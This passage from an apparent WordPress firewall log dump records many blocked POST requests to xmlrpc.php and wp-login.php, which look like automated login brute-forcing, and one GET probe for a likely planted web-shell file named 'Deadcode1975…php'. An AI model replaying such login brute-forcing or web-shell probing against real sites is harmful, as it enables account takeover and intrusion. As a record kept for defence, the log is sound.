Safari\\/537.36\",\"2\":\"www.google.com\"}','zrRbMYjewKk6VLQhUCO13WsG',0,1664728186.4986,307,'','GET',403,0,700,0,1,'',0),('185.250.202.147',3120220819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','fgSvD5uMErwUZQTNVzXO9PlW',0,1664728486.7091,15704,'','POST',403,0,515,0,1,'',0),('82.165.88.95',1386567775,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','RDbQ7AyfOFpwo146ET9qrBSP',0,1664728484.7763,17668,'','POST',403,0,515,0,1,'',0),('46.226.80.84',786583636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','R36D2l9iUJYQGsKnMm4qSNOf',0,1664728488.9021,13704,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','13zLdkFRsWKE8rhIJGZ9CVBe',0,1664728508.2389,554,'','POST',403,0,515,0,1,'',0),('65.2.119.66',1090680642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4fsmUPZ9Q20N8KGBqTo5kJdc',0,1664728510.5547,565,'','POST',403,0,515,0,1,'',0),('185.232.14.51',3118992947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','2bBxHKwcmyX3ELProhRCO57Y',0,1664728516.8308,505,'','POST',403,0,515,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','RpdQwAG9Ej5CtB2niDmLo1Pg',0,1664728519.8860,468,'','POST',403,0,515,0,1,'',0),('217.21.77.162',3642052002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','7wsHXUKBloLjfvSDMG6qEgiZ',0,1664728522.2961,1090,'','POST',403,0,515,0,1,'',0),('91.189.176.172',1539158188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','jKL71sf5xCvyJ8qgVSX6YQBu',0,1664728528.9749,1094,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','NIDtdfAuVnyzYLweRW8EZvKm',0,1664728530.5296,530,'','POST',403,0,515,0,1,'',0),('80.74.145.155',1347064219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bGCx923tZY61Djl8wuWFdfyh',0,1664728531.7670,634,'','POST',403,0,515,0,1,'',0),('88.99.248.98',1482946658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','P61NpwFDdIav7tJfERYjU9Zy',0,1664731765.4032,1828,'','POST',403,0,515,0,1,'',0),('185.224.138.16',3118500368,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','GRwZHNWPC5ux2M4h0StJkpXj',0,1664731770.1440,778,'','POST',403,0,515,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','PUDnRLjqbe0IHWcaJ2FtC9Q8',0,1664731770.8118,587,'','POST',403,0,515,0,1,'',0),('84.22.153.127',1410767231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','b1vNQuMPTpAVGriFOJWy6gcX',0,1664731775.1799,560,'','POST',403,0,515,0,1,'',0),('129.143.253.19',2173697299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','Z0EtsnMJRUexi1dLPY4K7gjT',0,1664731779.8561,516,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','XvnT6EtO1Mi7IdWDxLqarGCb',0,1664732638.9243,12197,'','POST',403,0,600,0,1,'',0),('51.142.136.99',864979043,'','http://cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4khKxmiyQfe0CdEaAM1uNFJI',0,1664735288.5212,12214,'','GET',403,0,700,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','TtR3QcZM8FW4YBNu0Obp7Imw',0,1664747978.9765,1735,'','POST',403,0,515,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','OkTq5BpQgD6SH8NIPa7LujUe',0,1664754183.8241,1205,'','POST',403,0,515,0,1,'',0),('45.77.245.245',760083957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','oZpuS2hq9rxU10l6AwGLIYBg',0,1664758243.4984,563,'','POST',403,0,515,0,1,'',0),('124.221.179.165',2094904229,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','mnI3hwTyYAtMNiQ6efHCdsWz',0,1664758246.6595,1193,'','POST',403,0,515,0,1,'',0),('92.204.161.74',1556914506,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','ZaFexvcqLUmh2zrE8Hu0SYD9',0,1664762520.6902,981,'','POST',403,0,515,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','x0FeIdjzqpDoaPns3KLl1hGE',0,1664762524.5870,496,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','wmBcO3sXCpr4D725zJPSQHav',0,1664762525.8429,653,'','POST',403,0,515,0,1,'',0),('124.40.255.186',2083061690,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j8KcfI4PnYZ0VvzUEHC356MB',0,1664762605.3154,1274,'','POST',403,0,515,0,1,'',0),('67.222.152.219',1138661595,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uyhUVGQM15XYF8jq2RaopJfL',0,1664762622.1332,513,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qFBmZDh5Vp2u81gz34KAlHf0',0,1664762874.0002,2043,'','POST',403,0,515,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CpeHjaOSbNEMtyP5Lv4c1mJz',0,1664762900.3723,18798,'','POST',403,0,515,0,1,'',0),('45.125.239.179',763228083,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eEnG4c2pKTPXvz8rCR57xlMj',0,1664763153.8888,1261,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V5UrICcOwnGslz10BvLd7ajY',0,1664763161.8769,489,'','POST',403,0,515,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vLuxytDwAOnSFJ9j3ioWP2KQ',0,1664763414.5715,1173,'','POST',403,0,515,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yKe25H84So3kRd6pTPGE7zjn',0,1664763693.8632,1337,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1Cx9bQmLfIlUGZBXsvAku0jD',0,1664763697.5073,511,'','POST',403,0,515,0,1,'',0),('165.22.89.6',2769705222,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Gz4WJ6IK9qXhRsSDfC8QpjNA',0,1664763967.6541,6699,'','POST',403,0,515,0,1,'',0),('208.113.149.124',3497104764,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RlDjGdxIUyQO1uMtsZ2mEBfp',0,1664763956.8632,17514,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fojc6QJ3gxFSZRmIMK1YWqX0',0,1664764220.3146,2044,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rxnqQjl1cDy2bUPgkhWLZ438',0,1664764227.2663,560,'','POST',403,0,515,0,1,'',0),('103.145.50.127',1737568895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FMBVCRjmczbhHTDN1iwunJ34',0,1664764484.4083,18016,'','POST',403,0,515,0,1,'',0),('45.14.224.167',755949735,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eRG9iN0ZMB8XHnvjSFldTwYq',0,1664764500.4591,2023,'','POST',403,0,515,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8SmFwdcCZYanTGx5ADBJKs9h',0,1664764750.6197,1412,'','POST',403,0,515,0,1,'',0),('128.199.21.138',2160530826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Tqa4YlKUhV2Znc8e6GspARIx',0,1664764994.4242,4793,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fJlNFhY0qbjPBmEMt5A12Oap',0,1664764981.8290,17400,'','POST',403,0,515,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aCXtiHwfD6Ahz7pLM5OFSe1R',0,1664765256.1781,4820,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ajyfFOU5gQbsoB67kWKed9mw',0,1664765245.3264,15673,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jftYvSicP4XzHQFgRNOlG70C',0,1664765497.8471,8139,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CywIHa6A1xGl7Um432FPENKD',0,1664765487.1294,18967,'','POST',403,0,515,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9dXYAV3C54IJD71xBtkncz0m',0,1664765747.2006,17521,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6VflHJQgLwmEp52zaxU1RM7b',0,1664765751.1042,13692,'','POST',403,0,515,0,1,'',0),('135.125.207.25',2273169177,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5jQkvJNmzB3y8pF1hAtLcaY0',0,1664765998.1928,1717,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xqvQh8dOCWcf9KUYpATLRNlk',0,1664767857.0084,18285,'','POST',403,0,515,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KnHSEWTk9iexmGXB3yZUNgQ4',0,1664767866.0332,9356,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','oO1CymbG5BlczigDfjATsZVK',0,1664767894.6494,509,'','POST',403,0,515,0,1,'',0),('200.150.202.196',3365325508,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','6lfXB3s1cLdEgMRpoC4ImSrx',0,1664767898.1210,523,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','r2q7BQnm8tGvefld5LY1Do9u',0,1664767906.9337,2061,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','d0vFp81sL3hEy9ZiIRtWfTcH',0,1664767908.0085,1383,'','POST',403,0,515,0,1,'',0),('84.22.153.127',1410767231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','zXSP68gvjoHLhCO53GdsEufY',0,1664767913.7212,649,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','OlaCABn4GNXuYTQvjF8MPJg9',0,1664767914.7200,529,'','POST',403,0,515,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ipUy0Ml54RqaVvkdmJsFQCth',0,1664767916.3479,488,'','POST',403,0,515,0,1,'',0),('46.226.80.84',786583636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','a5doQBX7jtfs28iRuPlqbDvk',0,1664767920.8178,516,'','POST',403,0,515,0,1,'',0),('185.34.32.183',3106021559,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','QqfsmNSyhGBFZYMxU1bAgc5t',0,1664767924.1927,507,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','Sokyc4qj1FbKYf6we5lRt7hH',0,1664767933.4343,523,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','smDtG0FlnbUX2Y8CvBzHOcLh',0,1664768077.4253,16829,'','POST',403,0,600,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wVuzmHXoegnrYM8AIRlC3UcE',0,1664768150.3927,2364,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w1ky9qRYIXn6ijCeZv8uzGQb',0,1664768445.5886,12831,'','POST',403,0,515,0,1,'',0),('43.129.212.158',729928862,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jYk2AXxMcPuiSbsJUdo1RmFq',0,1664768443.8413,15221,'','POST',403,0,515,0,1,'',0),('45.77.131.169',760054697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sR36jgNX5OnZVz2GvEHQClew',0,1664768717.3254,18508,'','POST',403,0,515,0,1,'',0),('207.244.248.44',3488938028,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KxyNi7J9g6wOjeHdUqnuBzGW',0,1664769013.0573,13530,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SKet7spLOwEv2ck3rnidZM01',0,1664769316.2243,18491,'','POST',403,0,515,0,1,'',0),('46.29.50.200',773665480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','e1iqawRAjbZ7xHLyYsfduWpo',0,1664770739.0566,2328,'','POST',403,0,515,0,1,'',0),('202.226.37.184',3403818424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','br3X5Q7nkOwzDlFcAIfGBJs0',0,1664770738.5374,2854,'','POST',403,0,515,0,1,'',0),('217.21.85.126',3642054014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','sqAg0JPmBH9lLp1u5OoMGhjT',0,1664770747.4369,540,'','POST',403,0,515,0,1,'',0),('185.2.4.104',3103917160,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','c3f7vbPUl5GJCsVrqEAgzxjO',0,1664770753.1321,582,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','MpkbsORZIGYQvFtVKB7wafS0',0,1664770755.5790,533,'','POST',403,0,515,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Mc1XxVHvnuL7FdWr0aZ2gPpm',0,1664770758.9777,478,'','POST',403,0,515,0,1,'',0),('34.207.124.111',584023151,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','rjxz7JclmQdyUqGsg1IhouYn',0,1664770759.6954,489,'','POST',403,0,515,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','NzcvJ2Vn0Gx4og97tBLHk1KD',0,1664770767.5972,473,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','cd7TayZuUgGSIbYOknwj0Jie',0,1664770769.7394,466,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YhS4vet7cazTIORKXmj1y9Z3',0,1664770840.6348,1387,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PXc1Lz5Ytedg8NibMjxTECn3',0,1664770847.3338,1399,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S1XwQ5EtZ9IzGBAhjHkL64qc',0,1664771153.7941,5756,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ScORuwxIzA8pZmeNDUn32y70',0,1664771149.5566,10021,'','POST',403,0,515,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y1sAKon0GPIrJtO4QNzViTbw',0,1664771489.0301,12063,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EHRpnukXl3TAYG68S2F7Kjzh',0,1664771483.5749,17551,'','POST',403,0,515,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','omNEWIfBgT32PHlF0OceDASx',0,1664771778.9354,8985,'','POST',403,0,515,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','NzOxbI3kTiJ6KogQYVcHR7eF',0,1664771781.2374,6696,'','POST',403,0,600,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kO6vpVIyc8gSXrztEZujoY2q',0,1664771813.0853,1558,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VxZ8lDkbo0wQOTLBsKArY3uM',0,1664772133.3845,18222,'','POST',403,0,515,0,1,'',0),('85.119.122.23',1433893399,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 